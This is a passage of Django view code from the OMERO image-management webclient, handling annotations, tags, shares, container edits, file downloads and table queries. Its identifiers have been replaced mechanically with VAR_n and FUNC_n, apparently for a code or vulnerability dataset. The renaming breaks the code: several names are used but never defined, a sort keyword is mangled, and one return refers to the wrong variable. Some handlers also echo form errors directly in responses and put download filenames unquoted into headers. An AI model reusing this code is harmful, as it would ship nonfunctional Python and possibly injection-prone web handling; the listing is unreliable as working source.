len(VAR_71.getlist("acquisition")) > 0
and list(VAR_6.getObjects("PlateAcquisition", VAR_71.getlist("acquisition")))
or list()
)
VAR_112 = (
len(VAR_71.getlist("share")) > 0 and [VAR_6.getShare(VAR_71.getlist("share")[0])] or list()
)
VAR_113 = (
len(VAR_71.getlist("well")) > 0
and list(VAR_6.getObjects("Well", VAR_71.getlist("well")))
or list()
)
return {
"image": VAR_106,
"dataset": VAR_107,
"project": VAR_108,
"screen": VAR_109,
"plate": VAR_110,
"acquisition": VAR_111,
"well": VAR_113,
"share": VAR_112,
}
def FUNC_44(VAR_2):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_114 = {
"images": VAR_71.getlist("image"),
"datasets": VAR_71.getlist("dataset"),
"projects": VAR_71.getlist("project"),
"screens": VAR_71.getlist("screen"),
"plates": VAR_71.getlist("plate"),
"acquisitions": VAR_71.getlist("acquisition"),
"wells": VAR_71.getlist("well"),
"shares": VAR_71.getlist("share"),
}
return VAR_114
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
VAR_143 = FUNC_43(VAR_2, VAR_6)
VAR_144 = []
VAR_145 = []
VAR_146 = set()
VAR_147 = False
for VAR_312 in VAR_143:
VAR_144 += ["%s=%s" % (VAR_312, o.id) for o in VAR_143[VAR_312]]
for o in VAR_143[VAR_312]:
VAR_146.add(o.getDetails().group.id.val)
if not o.canAnnotate():
VAR_147 = (
"Can't add annotations because you don't" " have permissions"
)
VAR_145.append({"type": VAR_312.title(), "id": o.id, "name": o.getName()})
VAR_148 = "&".join(VAR_144)
VAR_149 = "|".join(VAR_144).replace("=", "-")
if len(VAR_146) == 0:
if (
len(VAR_2.GET.getlist("tag")) > 0
or len(VAR_2.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
else:
return handlerInternalError(VAR_2, "No objects found")
VAR_150 = list(VAR_146)[0]
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
VAR_104 = BaseContainer(VAR_6)
VAR_117 = VAR_104.listFigureScripts(VAR_143)
VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
VAR_152 = None
VAR_153 = []
if "image" in VAR_143 and len(VAR_143["image"]) > 0:
VAR_153 = [VAR_320.getId() for VAR_320 in VAR_143["image"]]
if len(VAR_153) > 0:
VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
VAR_152["count"] += VAR_283["count"]
VAR_152["size"] += VAR_283["size"]
VAR_53 = {
"iids": VAR_153,
"obj_string": VAR_148,
"link_string": VAR_149,
"obj_labels": VAR_145,
"batch_ann": True,
"figScripts": VAR_117,
"canExportAsJpg": VAR_151,
"filesetInfo": VAR_152,
"annotationBlocked": VAR_147,
"differentGroups": False,
}
if len(VAR_146) > 1:
VAR_53["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
VAR_53["differentGroups"] = True # E.g. don't run VAR_203 etc
VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
VAR_53["template"] = "webclient/annotations/FUNC_45.html"
VAR_53["webclient_path"] = VAR_352("webindex")
VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
FUNC_43(VAR_2, VAR_6)
)
return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
if VAR_155 == 0:
raise Http404("Need to specify objects via e.g. ?VAR_142=1")
VAR_104 = None
if VAR_155 == 1:
for VAR_433 in VAR_114:
if len(VAR_114[VAR_433]) > 0:
VAR_28 = VAR_433[:-1] # "images" -> "image"
VAR_29 = VAR_114[VAR_433][0]
break
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if VAR_28 == "tagset":
VAR_28 = "tag"
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_94[VAR_347(VAR_28)] = int(VAR_29)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_104 is not None:
VAR_284 = VAR_104.getFilesByObject()
else:
VAR_104 = BaseContainer(VAR_6)
for VAR_215, VAR_143 in VAR_154.items():
if len(VAR_143) > 0:
VAR_284 = VAR_104.getFilesByObject(
VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
)
break
VAR_115["files"] = VAR_284
if VAR_2.method == "POST":
VAR_285 = FilesAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_285.is_valid():
VAR_284 = VAR_285.cleaned_data["files"]
VAR_355 = []
if VAR_284 is not None and len(VAR_284) > 0:
VAR_355 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
VAR_234 = (
"annotation_file" in VAR_2.FILES
and VAR_2.FILES["annotation_file"]
or None
)
if VAR_234 is not None and VAR_234 != "":
VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
VAR_355.append(VAR_399)
return JsonResponse({"fileIds": VAR_355})
else:
return HttpResponse(VAR_285.errors)
else:
VAR_285 = FilesAnnotationForm(VAR_115=initial)
VAR_53 = {"form_file": VAR_285}
VAR_54 = "webclient/annotations/files_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Only POST supported")
VAR_156 = getIntOrDefault(VAR_2, "rating", 0)
VAR_154 = FUNC_43(VAR_2, VAR_6)
for VAR_311, VAR_143 in VAR_154.items():
for o in VAR_143:
o.setRating(VAR_156)
return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404("Unbound instance of VAR_22 not available.")
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
"shares": VAR_154["share"],
}
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_157 = CommentAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
if VAR_157.is_valid():
VAR_286 = VAR_157.cleaned_data["comment"]
if VAR_286 is not None and VAR_286 != "":
if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
VAR_400 = VAR_154["share"][0].id
VAR_104 = BaseShare(VAR_6, VAR_400)
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_352("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
VAR_53 = {
"tann": VAR_402,
"added_by": VAR_6.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
VAR_104 = BaseContainer(VAR_6)
VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
return VAR_53
else:
return HttpResponse(VAR_347(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
raise Http404(
"Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
)
VAR_154 = FUNC_43(VAR_2, VAR_6)
if len(VAR_154["share"]) < 1:
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_158 = VAR_2.POST.get("mapAnnotation")
VAR_158 = json.loads(VAR_158)
VAR_159 = VAR_2.POST.getlist("annId")
VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
if len(VAR_159) == 0 and len(VAR_158) > 0:
VAR_287 = VAR_2.POST.get("duplicate", "false")
VAR_287.lower() == "true"
if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
VAR_287 = True
if VAR_287:
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
VAR_38.linkAnnotation(VAR_180)
else:
VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
VAR_180.setValue(VAR_158)
VAR_180.setNs(VAR_90)
VAR_180.save()
VAR_159.append(VAR_180.getId())
for VAR_415, VAR_143 in VAR_154.items():
for VAR_38 in VAR_143:
VAR_38.linkAnnotation(VAR_180)
else:
for VAR_34 in VAR_159:
VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
if VAR_180 is None:
continue
if len(VAR_158) > 0:
VAR_180.setValue(VAR_158)
VAR_180.save()
else:
VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
if len(VAR_158) == 0:
VAR_159 = None
return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
VAR_101 = FUNC_0(VAR_2, "group", -1)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_347(VAR_101))
try:
VAR_177 = int(VAR_2.GET.get("offset"))
VAR_88 = int(VAR_2.GET.get("limit", 1000))
except Exception:
VAR_177 = VAR_88 = None
VAR_160 = VAR_2.GET.get("jsonmode")
if VAR_160 == "tagcount":
VAR_288 = VAR_6.getTagCount()
return dict(VAR_288=tag_count)
VAR_104 = BaseContainer(VAR_6)
VAR_104.loadTagsRecursive(eid=-1, VAR_177=offset, VAR_88=limit)
VAR_161 = VAR_104.tags_recursive
VAR_162 = VAR_104.tags_recursive_owners
if VAR_160 == "tags":
VAR_71 = list((VAR_320, VAR_433, o, s) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
return VAR_71
elif VAR_160 == "desc":
return dict((VAR_320, VAR_364) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
elif VAR_160 == "owners":
return VAR_162
return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
VAR_154 = FUNC_43(VAR_2, VAR_6)
VAR_114 = FUNC_44(VAR_2)
VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
VAR_104 = None
VAR_163 = VAR_6.getEventContext().userId
VAR_164 = []
for obs in VAR_154.values():
if len(obs) > 0:
VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
VAR_165, VAR_166 = tree.marshal_annotations(
VAR_6,
VAR_44=VAR_114["projects"],
VAR_45=VAR_114["datasets"],
VAR_46=VAR_114["images"],
VAR_47=VAR_114["screens"],
VAR_48=VAR_114["plates"],
VAR_85=VAR_114["acquisitions"],
VAR_86=VAR_114["wells"],
VAR_89="tag",
VAR_88=VAR_1,
)
VAR_167 = {}
for VAR_232 in VAR_166:
VAR_167[VAR_232["id"]] = VAR_232
if VAR_155 > 1:
VAR_289 = {}
for VAR_433 in VAR_165:
VAR_356 = VAR_433["id"]
if VAR_356 not in VAR_289:
VAR_289[VAR_356] = 0
if VAR_433["link"]["owner"]["id"] == VAR_163:
VAR_289[VAR_356] += 1
VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
VAR_168 = []
for tag in VAR_165:
VAR_290 = tag["link"]["owner"]["id"]
VAR_103 = VAR_167[VAR_290]
VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
VAR_292 = True
VAR_293 = tag["link"]["date"]
VAR_294 = VAR_290 == VAR_163
VAR_168.append(
(tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
)
VAR_168.sort(VAR_312=lambda x: x[0])
VAR_115 = {
"selected": VAR_114,
"images": VAR_154["image"],
"datasets": VAR_154["dataset"],
"projects": VAR_154["project"],
"screens": VAR_154["screen"],
"plates": VAR_154["plate"],
"acquisitions": VAR_154["acquisition"],
"wells": VAR_154["well"],
}
if VAR_2.method == "POST":
VAR_295 = TagsAnnotationForm(VAR_115=initial, VAR_158=VAR_2.POST.copy())
VAR_296 = NewTagsAnnotationFormSet(
prefix="newtags", VAR_158=VAR_2.POST.copy()
)
if VAR_295.is_valid() and VAR_296.is_valid():
VAR_357 = [stag[0] for stag in VAR_168 if stag[5]]
VAR_357 = list(set(VAR_357))
VAR_358 = list(VAR_295.cleaned_data["tags"])
VAR_164 = [tag for tag in VAR_358 if tag not in VAR_357]
VAR_359 = [tag for tag in VAR_357 if tag not in VAR_358]
VAR_104 = BaseContainer(VAR_6)
if VAR_164:
VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
VAR_360 = []
for VAR_22 in VAR_296.forms:
VAR_360.append(
VAR_104.createTagAnnotations(
VAR_22.cleaned_data["tag"],
VAR_22.cleaned_data["description"],
VAR_154,
tag_group_id=VAR_22.cleaned_data["tagset"],
)
)
for remove in VAR_359:
VAR_403 = BaseContainer(VAR_6, tag=remove)
VAR_403.remove(
[
"%s-%s" % (VAR_215, VAR_38.id)
for VAR_215, VAR_143 in VAR_154.items()
for VAR_38 in VAR_143
],
tag_owner_id=VAR_163,
)
return JsonResponse({"added": VAR_164, "removed": VAR_359, "new": VAR_360})
else:
return HttpResponse(VAR_347(VAR_295.errors))
else:
VAR_295 = TagsAnnotationForm(VAR_115=initial)
VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
VAR_53 = {
"form_tags": VAR_295,
"newtags_formset": VAR_296,
"selected_tags": VAR_168,
}
VAR_54 = "webclient/annotations/tags_form.html"
VAR_53["template"] = VAR_54
return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
VAR_169 = VAR_142.getSizeC()
VAR_170 = {}
VAR_171 = {}
for VAR_320 in range(VAR_169):
VAR_297 = VAR_2.POST.get("channel%d" % VAR_320, None)
if VAR_297 is not None:
VAR_297 = smart_str(VAR_297)[:255] # Truncate to fit in DB
VAR_170["channel%d" % VAR_320] = VAR_297
VAR_171[VAR_320 + 1] = VAR_297
if VAR_2.POST.get("confirm_apply", None) is not None:
VAR_298 = VAR_2.POST.get("parentId", None)
if VAR_298 is not None:
VAR_255 = VAR_298.split("-")[0].title()
VAR_361 = VAR_241(VAR_298.split("-")[1])
VAR_299 = VAR_6.setChannelNames(VAR_255, [VAR_361], VAR_171, channelCount=VAR_169)
else:
VAR_299 = VAR_6.setChannelNames("Image", [VAR_142.getId()], VAR_171)
VAR_172 = {"channelNames": VAR_170}
if VAR_299:
VAR_172["imageCount"] = VAR_299["imageCount"]
VAR_172["updateCount"] = VAR_299["updateCount"]
return VAR_172
else:
return {"error": "No VAR_413 found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
VAR_54 = None
VAR_104 = None
if VAR_28 in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
VAR_94 = {}
if VAR_28 is not None and int(VAR_29) > 0:
VAR_29 = int(VAR_29)
VAR_94[VAR_347(VAR_28)] = VAR_29
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
elif VAR_28 in ("share", "sharecomment", "chat"):
VAR_104 = BaseShare(VAR_6, VAR_29)
else:
VAR_104 = BaseContainer(VAR_6)
VAR_22 = None
if VAR_27 == "addnewcontainer":
if not VAR_2.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, VAR_315=405
)
VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_347(VAR_22.cleaned_data)))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_362 = VAR_22.cleaned_data["description"]
VAR_103 = VAR_22.cleaned_data["owner"]
if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_40 = VAR_104.createDataset(VAR_3, VAR_362, VAR_103=owner)
elif VAR_28 == "tagset" and VAR_29 > 0:
VAR_40 = VAR_104.createTag(VAR_3, VAR_362, VAR_103=owner)
elif VAR_2.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
VAR_441 = VAR_2.POST.get("folder_type")
if VAR_441 == "dataset":
VAR_40 = VAR_104.createDataset(
VAR_3,
VAR_362,
VAR_103=owner,
img_ids=VAR_2.POST.getlist("image", None),
)
else:
VAR_40 = VAR_6.createContainer(
VAR_441, VAR_3, VAR_362, VAR_103=owner
)
else:
return HttpResponseServerError("Object does not exist")
VAR_363 = {"bad": "false", "id": VAR_40}
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
elif VAR_27 == "edit":
if VAR_29 is None:
raise Http404("No share ID")
if VAR_28 == "share" and int(VAR_29) > 0:
VAR_54 = "webclient/public/share_form.html"
VAR_104.getMembers(VAR_29)
VAR_104.getComments(VAR_29)
VAR_404 = list(VAR_6.getExperimenters())
VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
VAR_115 = {
"message": VAR_104.share.message,
"expiration": "",
"shareMembers": VAR_104.membersInShare,
"enable": VAR_104.share.active,
"experimenters": VAR_404,
}
if VAR_104.share.getExpireDate() is not None:
VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
"%Y-%m-%d"
)
VAR_22 = ShareForm(VAR_115=initial) # 'guests':share.guestsInShare,
VAR_53 = {"manager": VAR_104, "form": VAR_22}
elif VAR_27 == "save":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if VAR_28 == "share":
VAR_404 = list(VAR_6.getExperimenters())
VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
VAR_22 = ShareForm(
VAR_115={"experimenters": VAR_404}, VAR_158=VAR_2.POST.copy()
)
if VAR_22.is_valid():
VAR_0.debug("Update share: %s" % (VAR_347(VAR_22.cleaned_data)))
VAR_382 = VAR_22.cleaned_data["message"]
VAR_442 = VAR_22.cleaned_data["expiration"]
VAR_64 = VAR_22.cleaned_data["members"]
VAR_443 = VAR_22.cleaned_data["enable"]
VAR_401 = "%s?server=%i" % (
VAR_2.build_absolute_uri(
VAR_352("load_template", args=["public"])
),
int(VAR_6.server_id),
)
VAR_104.updateShareOrDiscussion(
VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
)
VAR_71 = "enable" if VAR_443 else "disable"
return HttpResponse(VAR_71)
else:
VAR_54 = "webclient/public/share_form.html"
VAR_53 = {"share": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editname":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
if VAR_28 == "tag":
VAR_445 = VAR_38.textValue
else:
VAR_445 = VAR_38.getName()
VAR_22 = ContainerNameForm(VAR_115={"name": VAR_445})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savename":
if not VAR_2.method == "POST":
return HttpResponseRedirect(
VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
VAR_3 = VAR_22.cleaned_data["name"]
VAR_363 = {"bad": "false", "o_type": VAR_28}
VAR_104.updateName(VAR_28, VAR_3)
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "editdescription":
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_38 = getattr(VAR_104, VAR_28)
VAR_54 = "webclient/ajax_form/container_form_ajax.html"
VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
VAR_53 = {"manager": VAR_104, "form": VAR_22}
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "savedescription":
if not VAR_2.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (VAR_27, VAR_28, VAR_29)
)
if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
if VAR_22.is_valid():
VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
VAR_362 = VAR_22.cleaned_data["description"]
VAR_104.updateDescription(VAR_28, VAR_362)
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
else:
VAR_364 = dict()
for e in VAR_22.errors.items():
VAR_364.update({e[0]: unicode(e[1])})
VAR_363 = {"bad": "true", "errs": VAR_364}
return JsonResponse(VAR_363)
else:
return HttpResponseServerError("Object does not exist")
elif VAR_27 == "remove":
VAR_82 = VAR_2.POST["parent"]
try:
VAR_104.remove(VAR_82.split("|"))
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
return JsonResponse(VAR_363)
rdict = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "removefromshare":
VAR_256 = VAR_2.POST.get("source")
try:
VAR_104.removeImage(VAR_256)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
return JsonResponse(VAR_363)
rdict = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "delete":
VAR_455 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
try:
VAR_84 = VAR_104.deleteItem(VAR_455, VAR_91)
VAR_2.session["callback"][VAR_347(VAR_84)] = {
"job_type": "delete",
"delmany": False,
"did": VAR_29,
"dtype": VAR_28,
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"start_time": datetime.datetime.now(),
}
VAR_2.session.modified = True
except Exception as x:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
)
VAR_363 = {"bad": "true", "errs": VAR_347(x)}
else:
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
elif VAR_27 == "deletemany":
VAR_457 = {
"Image": VAR_2.POST.getlist("image"),
"Dataset": VAR_2.POST.getlist("dataset"),
"Project": VAR_2.POST.getlist("project"),
"Annotation": VAR_2.POST.getlist("tag"),
"Screen": VAR_2.POST.getlist("screen"),
"Plate": VAR_2.POST.getlist("plate"),
"Well": VAR_2.POST.getlist("well"),
"PlateAcquisition": VAR_2.POST.getlist("acquisition"),
}
VAR_455 = toBoolean(VAR_2.POST.get("child"))
VAR_91 = toBoolean(VAR_2.POST.get("anns"))
VAR_0.debug(
"Delete many: VAR_455? %s VAR_91? %s VAR_457 %s" % (VAR_455, VAR_91, VAR_457)
)
try:
for VAR_312, VAR_187 in VAR_457.items():
if VAR_187 is not None and len(VAR_187) > 0:
VAR_84 = VAR_104.deleteObjects(VAR_312, VAR_187, VAR_455, VAR_91)
if VAR_312 == "PlateAcquisition":
VAR_312 = "Plate Run" # for nicer user VAR_382
VAR_459 = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(VAR_84),
"dtype": VAR_312,
}
if len(VAR_187) > 1:
VAR_459["delmany"] = len(VAR_187)
VAR_459["did"] = VAR_187
else:
VAR_459["delmany"] = False
VAR_459["did"] = VAR_187[0]
VAR_2.session["callback"][VAR_347(VAR_84)] = VAR_459
VAR_2.session.modified = True
except Exception:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_312}, exc_info=True
)
raise
else:
VAR_363 = {"bad": "false"}
return JsonResponse(VAR_363)
VAR_53["template"] = VAR_54
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
if VAR_173 is None:
return handlerInternalError(
VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
)
VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_175 = VAR_173.mimetype
if VAR_175 == "text/x-python":
VAR_175 = "text/plain" # allows display in browser
VAR_174["Content-Type"] = VAR_175
VAR_174["Content-Length"] = VAR_173.getSize()
if VAR_31:
VAR_300 = VAR_173.name.replace(" ", "_")
VAR_300 = downloadName.replace(",", ".")
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
VAR_176 = VAR_2.GET.get("query", "*")
VAR_177 = FUNC_0(VAR_2, "offset", 0)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_178 = None
try:
VAR_178 = VAR_352("omero_iviewer_index")
except NoReverseMatch:
pass
VAR_32 = VAR_241(VAR_32)
VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
if VAR_173 is None:
raise Http404("OriginalFile %s not found" % VAR_32)
VAR_179 = VAR_33 == "csv"
VAR_53 = webgateway_views._table_query(
VAR_2, VAR_32, VAR_6=conn, VAR_176=query, VAR_177=offset, VAR_88=limit, VAR_179=lazy
)
if VAR_53.get("error") or not VAR_53.get("data"):
return JsonResponse(VAR_53)
if VAR_33 == "csv":
VAR_301 = VAR_53.get("data")
VAR_302 = VAR_2.GET.get("header") == "false"
def FUNC_88():
if not VAR_302:
VAR_405 = ",".join(VAR_301.get("columns"))
yield VAR_405
for rows in VAR_301.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([VAR_347(VAR_364) for VAR_364 in VAR_378]) for VAR_378 in rows])
)
VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
VAR_300 = downloadName + ".csv"
VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
VAR_174.conn = VAR_6
VAR_174.table = VAR_53.get("table")
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
VAR_53["data"]["name"] = VAR_173.name
VAR_53["data"]["path"] = VAR_173.path
VAR_53["data"]["id"] = VAR_32
VAR_53["meta"]["query"] = VAR_176
if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
VAR_5 = VAR_352("omero_table", args=[VAR_32])
VAR_53["meta"]["url"] = VAR_5
VAR_5 += "?VAR_88=%s" % VAR_88
if VAR_176 != "*":
VAR_5 += "&VAR_176=%s" % VAR_176
if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
VAR_53["meta"]["next"] = VAR_5 + "&VAR_177=%s" % (VAR_177 + VAR_88)
if VAR_177 > 0:
VAR_53["meta"]["prev"] = VAR_5 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
if VAR_33 is None:
VAR_53["template"] = "webclient/annotations/FUNC_55.html"
VAR_53["iviewer_url"] = VAR_178
VAR_303 = VAR_53["data"]["column_types"]
if "ImageColumn" in VAR_303:
VAR_53["image_column_index"] = VAR_303.index("ImageColumn")
if "WellColumn" in VAR_303:
VAR_53["well_column_index"] = VAR_303.index("WellColumn")
if "RoiColumn" in VAR_303:
VAR_53["roi_column_index"] = VAR_303.index("RoiColumn")
VAR_304 = [VAR_390.lower() for VAR_390 in VAR_53["data"]["columns"]]
if "shape" in VAR_304 and VAR_303[VAR_304.index("shape")] == "LongColumn":
VAR_53["shape_column_index"] = VAR_304.index("shape")
for idx, VAR_23 in enumerate(VAR_303):
if VAR_23 in ("DoubleColumn", "LongColumn"):
VAR_406 = VAR_53["data"]["columns"][idx]
VAR_407 = []
for VAR_378 in VAR_53["data"]["rows"]:
if VAR_378[idx]:
VAR_407.append(VAR_378[idx])
if len(VAR_407) > 3:
break
if " " in VAR_406 or len(VAR_407) < 2:
continue
VAR_53["example_column"] = VAR_406
VAR_53["example_min_value"] = min(VAR_407)
VAR_53["example_max_value"] = max(VAR_407)
break
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
